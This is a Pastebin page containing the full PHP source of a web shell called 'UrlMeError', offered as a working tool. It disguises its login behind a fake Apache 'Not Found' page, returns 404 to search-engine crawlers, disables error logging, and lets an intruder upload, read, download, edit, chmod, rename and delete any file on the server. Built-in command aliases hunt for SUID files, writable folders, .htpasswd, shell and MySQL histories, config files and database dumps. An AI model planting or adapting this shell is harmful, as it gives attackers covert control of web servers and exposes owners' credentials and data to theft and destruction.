API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Sep 21st, 2018
106
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 17.27 KB | None | 0 0
raw download clone embed print report
  1. <?php
  2. session_start();
  3. error_reporting(0);
  4. set_time_limit(0);
  5. @set_magic_quotes_runtime(0);
  6. @clearstatcache();
  7. @ini_set('error_log',NULL);
  8. @ini_set('log_errors',0);
  9. @ini_set('max_execution_time',0);
  10. @ini_set('output_buffering',0);
  11. @ini_set('display_errors', 0);
  12. $auth_user = "529452e5eb83062be9d3cfa3c1784982"; // user : urlmeerror
  13. $auth_pass = "529452e5eb83062be9d3cfa3c1784982"; // pass : urlmeerror
  14. $errorforbidden = $_SERVER['REQUEST_URI'];
  15. $color = "#00ff00";
  16. $default_action = 'FilesMan';
  17. $default_use_ajax = true;
  18. $default_charset = 'UTF-8';
  19. if(!empty($_SERVER['HTTP_USER_AGENT'])) {
  20. $userAgents = array("Googlebot", "Slurp", "MSNBot", "PycURL", "facebookexternalhit", "ia_archiver", "crawler", "Yandex", "Rambler", "Yahoo! Slurp", "YahooSeeker", "bingbot");
  21. if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
  22. header('HTTP/1.0 404 Not Found');
  23. exit;
  24. }
  25. }
  26.  
  27. function login_shell() {
  28. ?>
  29. <?php
  30. $errorforbidden = $_SERVER['REQUEST_URI'];
  31. $login = '<style> input { margin:0;background-color:black;border:1px solid black; }</style>
  32. <center><form method="post"><input type="password" name="pass"></form></center>';
  33. ?>
  34. <html>
  35. <head>
  36. <meta charset="UTF-8">
  37. <meta http-equiv="refresh" content="1"/>
  38. </head>
  39. <body onbeforeunload="return Reload()">
  40. <script>
  41. function Reload() {
  42. return "Login This Page?"
  43. }
  44. </script>
  45. <body oncontextmenu='return false;' onkeydown='return true;' onmousedown='return false;' ondragstart='return false' onselectstart='return false' style='-moz-user-select: none; cursor: default;'>
  46. </body>
  47. <h1>Not Found</h1>
  48. <p>The requested URL was not found on this server.</p>
  49. <hr>
  50. <address>Apache Server at <?=$_SERVER['HTTP_HOST']?> Port 80</address>
  51. <style>
  52. input { margin:0;background-color:#fff;border:1px solid #fff; }
  53. </style>
  54. <center>
  55. <form method=post>
  56. <input type=password name=user>
  57. </form></center>
  58.  
  59. <center>
  60. <form method=post>
  61. <input type=password name=pass>
  62. </form></center>
  63. <?php
  64. exit;
  65. }
  66. if($sec == 1 && !isset( $_SESSION[md5($_SERVER['HTTP_HOST'])]))
  67. if( empty( $auth_pass ) ||
  68. ( isset( $_POST['pass'] ) && ( md5($_POST['pass']) == $auth_pass ) ) )
  69. $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
  70. else
  71. printLogin();
  72.  
  73. if( strtolower( substr(PHP_OS,0,3) ) == "win" )
  74. $os = 'win';
  75. else
  76. $os = 'nix';
  77. $safe_mode = @ini_get('safe_mode');
  78. $disable_functions = @ini_get('disable_functions');
  79. $home_cwd = @getcwd();
  80. if( isset( $_POST['c'] ) )
  81. @chdir($_POST['c']);
  82. $cwd = @getcwd();
  83. if( $os == 'win') {
  84. $home_cwd = str_replace("\\", "/", $home_cwd);
  85. $cwd = str_replace("\\", "/", $cwd);
  86. }
  87. if( $cwd[strlen($cwd)-1] != '/' )
  88. $cwd .= '/';
  89.  
  90. if($os == 'win')
  91. $aliases = array(
  92. "List Directory" => "dir",
  93. "Find index.php in current dir" => "dir /s /w /b index.php",
  94. "Find *config*.php in current dir" => "dir /s /w /b *config*.php",
  95. "Show active connections" => "netstat -an",
  96. "Show running services" => "net start",
  97. "User accounts" => "net user",
  98. "Show computers" => "net view",
  99. "ARP Table" => "arp -a",
  100. "IP Configuration" => "ipconfig /all"
  101. );
  102. else
  103. $aliases = array(
  104. "List dir" => "ls -la",
  105. "list file attributes on a Linux second extended file system" => "lsattr -va",
  106. "show opened ports" => "netstat -an | grep -i listen",
  107. "Find" => "",
  108. "find all suid files" => "find / -type f -perm -04000 -ls",
  109. "find suid files in current dir" => "find . -type f -perm -04000 -ls",
  110. "find all sgid files" => "find / -type f -perm -02000 -ls",
  111. "find sgid files in current dir" => "find . -type f -perm -02000 -ls",
  112. "find config.inc.php files" => "find / -type f -name config.inc.php",
  113. "find config* files" => "find / -type f -name \"config*\"",
  114. "find config* files in current dir" => "find . -type f -name \"config*\"",
  115. "find all writable folders and files" => "find / -perm -2 -ls",
  116. "find all writable folders and files in current dir" => "find . -perm -2 -ls",
  117. "find all service.pwd files" => "find / -type f -name service.pwd",
  118. "find service.pwd files in current dir" => "find . -type f -name service.pwd",
  119. "find all .htpasswd files" => "find / -type f -name .htpasswd",
  120. "find .htpasswd files in current dir" => "find . -type f -name .htpasswd",
  121. "find all .bash_history files" => "find / -type f -name .bash_history",
  122. "find .bash_history files in current dir" => "find . -type f -name .bash_history",
  123. "find all .fetchmailrc files" => "find / -type f -name .fetchmailrc",
  124. "find .fetchmailrc files in current dir" => "find . -type f -name .fetchmailrc",
  125. "Locate" => "",
  126. "locate httpd.conf files" => "locate httpd.conf",
  127. "locate vhosts.conf files" => "locate vhosts.conf",
  128. "locate proftpd.conf files" => "locate proftpd.conf",
  129. "locate psybnc.conf files" => "locate psybnc.conf",
  130. "locate my.conf files" => "locate my.conf",
  131. "locate admin.php files" =>"locate admin.php",
  132. "locate cfg.php files" => "locate cfg.php",
  133. "locate conf.php files" => "locate conf.php",
  134. "locate config.dat files" => "locate config.dat",
  135. "locate config.php files" => "locate config.php",
  136. "locate config.inc files" => "locate config.inc",
  137. "locate config.inc.php" => "locate config.inc.php",
  138. "locate config.default.php files" => "locate config.default.php",
  139. "locate config* files " => "locate config",
  140. "locate .conf files"=>"locate '.conf'",
  141. "locate .pwd files" => "locate '.pwd'",
  142. "locate .sql files" => "locate '.sql'",
  143. "locate .htpasswd files" => "locate '.htpasswd'",
  144. "locate .bash_history files" => "locate '.bash_history'",
  145. "locate .mysql_history files" => "locate '.mysql_history'",
  146. "locate .fetchmailrc files" => "locate '.fetchmailrc'",
  147. "locate backup files" => "locate backup",
  148. "locate dump files" => "locate dump",
  149. "locate priv files" => "locate priv"
  150. );
  151.  
  152. function printHeader() {
  153. if(empty($_POST['charset']))
  154. $_POST['charset'] = "UTF-8";
  155. global $color;
  156. ?>
  157. <?php print $login; ?>
  158. <?php
  159. exit;
  160. }
  161. if(!isset($_SESSION[md5($_SERVER['HTTP_HOST'])]))
  162. if( empty($auth_pass) || ( isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass) ) )
  163. $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
  164. else
  165. login_shell();
  166. if(isset($_GET['file']) && ($_GET['file'] != '') && ($_GET['act'] == 'download')) {
  167. @ob_clean();
  168. $file = $_GET['file'];
  169. header('Content-Description: File Transfer');
  170. header('Content-Type: application/octet-stream');
  171. header('Content-Disposition: attachment; filename="'.basename($file).'"');
  172. header('Expires: 0');
  173. header('Cache-Control: must-revalidate');
  174. header('Pragma: public');
  175. header('Content-Length: ' . filesize($file));
  176. readfile($file);
  177. exit;
  178. }
  179. echo '<!DOCTYPE HTML>
  180. <HTML>
  181. <HEAD>
  182. <title>UrlMeError</title>
  183. </head>
  184. <style>
  185. body{
  186. font-family: "console", cursive;
  187. background-color:black;
  188. text-shadow:0px 0px 1px solid lime;
  189. }
  190. #content tr:hover{
  191. background-color:black;
  192. text-shadow:0px 0px 10px solid lime;
  193. }
  194. #content .first{
  195. background-color:white;
  196. }
  197. #content .first:hover{
  198. background-color:white;
  199. text-shadow:0px 0px 1px solid lime;
  200. }
  201. table{
  202. border: 2px solid white; dotted;
  203. }
  204. H1{
  205. font-family: "Rye", cursive;
  206. }
  207. a{
  208. color:white;
  209. text-decoration: none;
  210. }
  211. a:hover{
  212. color:white;
  213. text-shadow:0px 0px 10px solid lime;
  214. }
  215. input,select,textarea{
  216. border: 1px solid white;
  217. -moz-border-radius: 5px;
  218. -webkit-border-radius:5px;
  219. border-radius:5px;
  220. }
  221. </style>
  222. <HEAD>
  223. </head>
  224. <BODY>
  225. <body ononline="Online()" onoffline="Offline()">
  226. <script>
  227. function Online() {
  228. alert ("Data Mode ON");
  229. }
  230. function Offline() {
  231. alert ("Data Mode OFF");
  232. }
  233. </script>
  234. <H2><center><style> #roll-bg { margin:1em auto; -webkit-perspective:1200px; -moz-perspective:1200px; -ms-perspective:1200px; perspective:1200px; } #roll-bg p { size:7; text-align:center; font color:white; font-family:cursive; padding:10px 0; } #roll-spin { -webkit-animation-name:roll-spin; -webkit-animation-timing-function:linear; -webkit-animation-iteration-count:infinite; -webkit-animation-duration:6s; animation-name:roll-spin; animation-timing-function:linear; animation-iteration-count:infinite; animation-duration:6s; -webkit-transform-style:preserve-3d; -moz-transform-style:preserve-3d; -ms-transform-style:preserve-3d; transform-style:preserve-3d; } #roll-spin:hover { -webkit-animation-play-state:play; animation-play-state:play; } @-webkit-keyframes roll-spin { from {-webkit-transform:rotateY(0deg);} to {-webkit-transform:rotateY(-360deg);} } @keyframes roll-spin { from {-moz-transform:rotateY(0deg); -ms-transform:rotateY(0deg); transform:rotateY(0deg);} to {-moz-transform:rotateY(-360deg); -ms-transform:rotateY(-360deg); transform:rotateY(-360deg);} } </style> <div id="roll-bg"> <p id="roll-spin"><img src="https://cdn.pbrd.co/images/HgYDvs7.png"width="150" height="150 "></div></center></H2>
  235. <body class=" pace-done" bgcolor="white"><font color="white"><div class="pace pace-inactive"><div class="pace-progress" data-progress-text="100%" data-progress="99" style="width: 100%;">
  236. <table width="1000" align="center">
  237. <tr><td>Current Path : ';
  238. if(isset($_GET['path'])){
  239. $path = $_GET['path'];
  240. }else{
  241. $path = getcwd();
  242. }
  243. $path = str_replace('\\','/',$path);
  244. $paths = explode('/',$path);
  245.  
  246. foreach($paths as $id=>$pat){
  247. if($pat == '' && $id == 0){
  248. $a = true;
  249. echo '<a href="?path=/">/</a>';
  250. continue;
  251. }
  252. if($pat == '') continue;
  253. echo '<a href="?path=';
  254. for($i=0;$i<=$id;$i++){
  255. echo "$paths[$i]";
  256. if($i != $id) echo "/";
  257. }
  258. echo '">'.$pat.'</a></font>/';
  259. }
  260. echo '</td></tr><tr><td>';
  261. if(isset($_FILES['file'])){
  262. if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){
  263. echo '<font color="lime">O</font><br />';
  264. }else{
  265. echo '<font color="red">-</font><br />';
  266. }
  267. }
  268. echo '<form enctype="multipart/form-data" method="POST">
  269. Upload File : <input type="file" name="file" />
  270. <input type="submit" value="upload"/>
  271. </form>
  272. </td></tr>';
  273. if(isset($_GET['filesrc'])){
  274. echo "<tr><td>Current File : ";
  275. echo $_GET['filesrc'];
  276. echo '</tr></td></table><br />';
  277. echo('<pre>'.htmlspecialchars(file_get_contents($_GET['filesrc'])).'</pre>');
  278. }elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){
  279. echo '</table><br /><center>'.$_POST['path'].'<br /><br />';
  280. if($_POST['opt'] == 'chmod'){
  281. if(isset($_POST['perm'])){
  282. if(chmod($_POST['path'],$_POST['perm'])){
  283. echo '<font color="lime">O</font><br />';
  284. }else{
  285. echo '<font color="red">-</font><br />';
  286. }
  287. }
  288. echo '<form method="POST">
  289. Permission : <input name="perm" type="text" size="4" value="'.substr(sprintf('%o', fileperms($_POST['path'])), -4).'" />
  290. <input type="hidden" name="path" value="'.$_POST['path'].'">
  291. <input type="hidden" name="opt" value="chmod">
  292. <input type="submit" value="Go" />
  293. </form>';
  294. }elseif($_POST['opt'] == 'rename'){
  295. if(isset($_POST['newname'])){
  296. if(rename($_POST['path'],$path.'/'.$_POST['newname'])){
  297. echo '<font color="lime">O</font><br />';
  298. }else{
  299. echo '<font color="red">-</font><br />';
  300. }
  301. $_POST['name'] = $_POST['newname'];
  302. }
  303. echo '<form method="POST">
  304. New Name : <input name="newname" type="text" size="20" value="'.$_POST['name'].'" />
  305. <input type="hidden" name="path" value="'.$_POST['path'].'">
  306. <input type="hidden" name="opt" value="rename">
  307. <input type="submit" value="Go" />
  308. </form>';
  309. }elseif($_POST['opt'] == 'edit'){
  310. if(isset($_POST['src'])){
  311. $fp = fopen($_POST['path'],'w');
  312. if(fwrite($fp,$_POST['src'])){
  313. echo '<font color="lime">O</font><br />';
  314. }else{
  315. echo '<font color="red">-</font><br />';
  316. }
  317. fclose($fp);
  318. }
  319. echo '<form method="POST">
  320. <textarea cols=80 rows=20 name="src">'.htmlspecialchars(file_get_contents($_POST['path'])).'</textarea><br />
  321. <input type="hidden" name="path" value="'.$_POST['path'].'">
  322. <input type="hidden" name="opt" value="edit">
  323. <input type="submit" value="Go" />
  324. </form>';
  325. }
  326. echo '</center>';
  327. }else{
  328. echo '</table><br /><center>';
  329. if(isset($_GET['option']) && $_POST['opt'] == 'delete'){
  330. if($_POST['type'] == 'dir'){
  331. if(rmdir($_POST['path'])){
  332. echo '<font color="lime">O</font><br />';
  333. }else{
  334. echo '<font color="red">-</font><br />';
  335. }
  336. }elseif($_POST['type'] == 'file'){
  337. if(unlink($_POST['path'])){
  338. echo '<font color="lime">O</font><br />';
  339. }else{
  340. echo '<font color="red">-</font><br />';
  341. }
  342. }
  343. }
  344. echo '</center>';
  345. $scandir = scandir($path);
  346. echo '<div id="content"><table width="1000" align="center">
  347. <tr class="first">
  348. <td><center><font color="black">Name</center></td>
  349. <td><center><font color="black">Size</center></td>
  350. <td><center><font color="black">Permissions</center></td>
  351. <td><center><font color="black">Options</font></center></td>
  352. </tr>';
  353.  
  354. foreach($scandir as $dir){
  355. if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue;
  356.  
  357. echo "<tr>
  358. <td><a href=\"?path=$path/$dir\">$dir</a></td>
  359. <td><center>--</center></td>
  360. <td><center>";
  361. if(is_writable("$path/$dir")) echo '<font color="lime">';
  362. elseif(!is_readable("$path/$dir")) echo '<font color="red">';
  363. echo perms("$path/$dir");
  364. if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo '</font>';
  365.  
  366. echo "</center></td>
  367. <td><center><form method=\"POST\" action=\"?option&path=$path\">
  368. <select name=\"opt\">
  369. <option value=\"\"></option>
  370. <option value=\"delete\">Delete</option>
  371. <option value=\"chmod\">Chmod</option>
  372. <option value=\"rename\">Rename</option>
  373. </select>
  374. <input type=\"hidden\" name=\"type\" value=\"dir\">
  375. <input type=\"hidden\" name=\"name\" value=\"$dir\">
  376. <input type=\"hidden\" name=\"path\" value=\"$path/$dir\">
  377. <input type=\"submit\" value=\"Oke\" />
  378. </form></center></td>
  379. </tr>";
  380. }
  381. echo '<tr class="first"><td></td><td></td><td></td><td></td></tr>';
  382. foreach($scandir as $file){
  383. if(!is_file("$path/$file")) continue;
  384. $size = filesize("$path/$file")/1024;
  385. $size = round($size,3);
  386. if($size >= 1024){
  387. $size = round($size/1024,2).' MB';
  388. }else{
  389. $size = $size.' KB';
  390. }
  391.  
  392. echo "<tr>
  393. <td><a href=\"?filesrc=$path/$file&path=$path\">$file</a></td>
  394. <td><center>".$size."</center></td>
  395. <td><center>";
  396. if(is_writable("$path/$file")) echo '<font color="lime">';
  397. elseif(!is_readable("$path/$file")) echo '<font color="red">';
  398. echo perms("$path/$file");
  399. if(is_writable("$path/$file") || !is_readable("$path/$file")) echo '</font>';
  400. echo "</center></td>
  401. <td><center><form method=\"POST\" action=\"?option&path=$path\">
  402. <select name=\"opt\">
  403. <option value=\"\"></option>
  404. <option value=\"delete\">Delete</option>
  405. <option value=\"chmod\">Chmod</option>
  406. <option value=\"rename\">Rename</option>
  407. <option value=\"edit\">Edit</option>
  408. </select>
  409. <input type=\"hidden\" name=\"type\" value=\"file\">
  410. <input type=\"hidden\" name=\"name\" value=\"$file\">
  411. <input type=\"hidden\" name=\"path\" value=\"$path/$file\">
  412. <input type=\"submit\" value=\"Oke\" />
  413. </form></center></td>
  414. </tr>";
  415. }
  416. echo '</table>
  417. </div>';
  418. }
  419. echo '<center></br></br></br></br></br><b>Copyright © National Security System 2018</font></b><center>
  420. </BODY>
  421. </HTML>';
  422. function perms($file){
  423. $perms = fileperms($file);
  424.  
  425. if (($perms & 0xC000) == 0xC000) {
  426. // Socket
  427. $info = 's';
  428. } elseif (($perms & 0xA000) == 0xA000) {
  429. // Symbolic Link
  430. $info = 'l';
  431. } elseif (($perms & 0x8000) == 0x8000) {
  432. // Regular
  433. $info = '-';
  434. } elseif (($perms & 0x6000) == 0x6000) {
  435. // Block special
  436. $info = 'b';
  437. } elseif (($perms & 0x4000) == 0x4000) {
  438. // Directory
  439. $info = 'd';
  440. } elseif (($perms & 0x2000) == 0x2000) {
  441. // Character special
  442. $info = 'c';
  443. } elseif (($perms & 0x1000) == 0x1000) {
  444. // FIFO pipe
  445. $info = 'p';
  446. } else {
  447. // Unknown
  448. $info = 'u';
  449. }
  450.  
  451. // Owner
  452. $info .= (($perms & 0x0100) ? 'r' : '-');
  453. $info .= (($perms & 0x0080) ? 'w' : '-');
  454. $info .= (($perms & 0x0040) ?
  455. (($perms & 0x0800) ? 's' : 'x' ) :
  456. (($perms & 0x0800) ? 'S' : '-'));
  457.  
  458. // Group
  459. $info .= (($perms & 0x0020) ? 'r' : '-');
  460. $info .= (($perms & 0x0010) ? 'w' : '-');
  461. $info .= (($perms & 0x0008) ?
  462. (($perms & 0x0400) ? 's' : 'x' ) :
  463. (($perms & 0x0400) ? 'S' : '-'));
  464.  
  465. // World
  466. $info .= (($perms & 0x0004) ? 'r' : '-');
  467. $info .= (($perms & 0x0002) ? 'w' : '-');
  468. $info .= (($perms & 0x0001) ?
  469. (($perms & 0x0200) ? 't' : 'x' ) :
  470. (($perms & 0x0200) ? 'T' : '-'));
  471.  
  472. return $info;
  473. }
  474. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!